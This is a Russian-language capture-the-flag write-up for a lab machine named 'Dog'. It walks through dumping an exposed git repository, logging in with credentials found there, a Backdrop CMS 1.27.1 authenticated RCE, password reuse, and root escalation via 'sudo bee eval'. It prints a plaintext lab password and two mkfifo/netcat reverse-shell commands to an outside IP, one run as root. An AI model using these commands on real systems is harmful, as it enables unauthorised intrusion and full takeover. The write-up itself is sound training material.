Dog (2025)

Тэги:

Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
Каталог /.git/
Повышение привилегий с помощью sudo bee

Содержание:

При сканировании портов было обнаружено 2 открытых tcp-порта: 22 и 80. На веб-порте присутствует git-репозиторий, который можно скачать с помощью утилиты git-dumper, и CMS Backdrop. В репозитории есть исходный код приложения с именем и паролем пользователя tiffany. Данная УЗ подошла для входа в CMS. Далее был использован эксплоит для получения первоначального доступа. В каталоге /home были обнаружены два домашних каталога пользователей. Пароль от УЗ tiffany подошёл к одному из них. Новый пользователь имел возможность запускать утилиту bee от лица суперпользователя и выполнять php-код. Таким образом были повышены привилегии до уровня root.

Разведка

При сканировании было обнаружено 2 открытых tcp-порта, а с помощью скриптов найден .git-репозиторий на одном из них:

На веб-порте расположена CMS:

Её название можно увидеть в самом низу страницы - Backdrop CMS:

Скачать репозиторий можно с помощью утилиты git_dumper:

GitHub - arthaud/git-dumper: A tool to dump a git repository from a websiteGitHub

При запуске нужно указать ссылку на .git каталог и место, куда он будет сохранён:

Содержимое скачанного репозитория:

В php-файлах можно найти пароль от пользователя root для сервиса mysql:

С помощью утилиты git можно посмотреть историю изменений:

С помощью git show можно посмотреть изменения конкретного коммита:

$ git show 8204779c764abd4c9d8d95038b6d22b6a7515afa

В истории видна почта пользователя root, где dog.htb - это домен. Используя эту информацию, можно найти ещё одного пользователя:

С этими данными можно попробовать авторизоваться в CMS:

tiffany:BackDropJ2024DS2024

Получение первоначального доступа (www-data)

После успешного входа можно определить версию Backdrop CMS (Reports -> Available Updates -> List available updates) для дальнейшего поиска эксплойта:

На exploit-db был найден эксплоит для версии 1.27.1 Backdrop CMS:

Однако по каким-то причинам он работал неправильно. Поэтому был использован другой эксплоит с GitHub:

GitHub - rvizx/backdrop-rce: Backdrop CMS 1.27.1 Authenticated Remote Code Execution (RCE) - PoC ExploitGitHub

В качестве аргументов для эксплоита нужно указать URL-адрес цели, имя пользователя и пароль:

Для удобства была также проброшена и стабилизирована дополнительная оболочка через mkfifo:

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.13 9898 >/tmp/f

$ python3 -c 'import pty;pty.spawn("/bin/bash");'
$ export TERM=xterm

Повышение привилегий - johncusack (Password Reuse)

В каталоге /home были обнаружены два домашних каталога пользователей jobert и johncusack. К одному из них подошел предыдущий пароль от tiffany:

Повышение привилегий - root (sudo bee)

Пользователь johncusack может запускать утилиту bee от лица суперпользователя:

$ sudo -l

В данной утилите есть опция eval, которая позволяет выполнять php-код:

Таким образом можно организовать реверс шелл от лица суперпользователя:

$ sudo bee --root=/var/www/html/ eval 'system("rm /tmp/ff;mkfifo /tmp/ff;cat /tmp/ff|bash -i 2>&1|nc 10.10.14.13 9999 >/tmp/ff")'

Проверка сессии:

PreviousCozyHosting (2025)NextEditorial (2025)

Last updated 22 days ago

Was this helpful?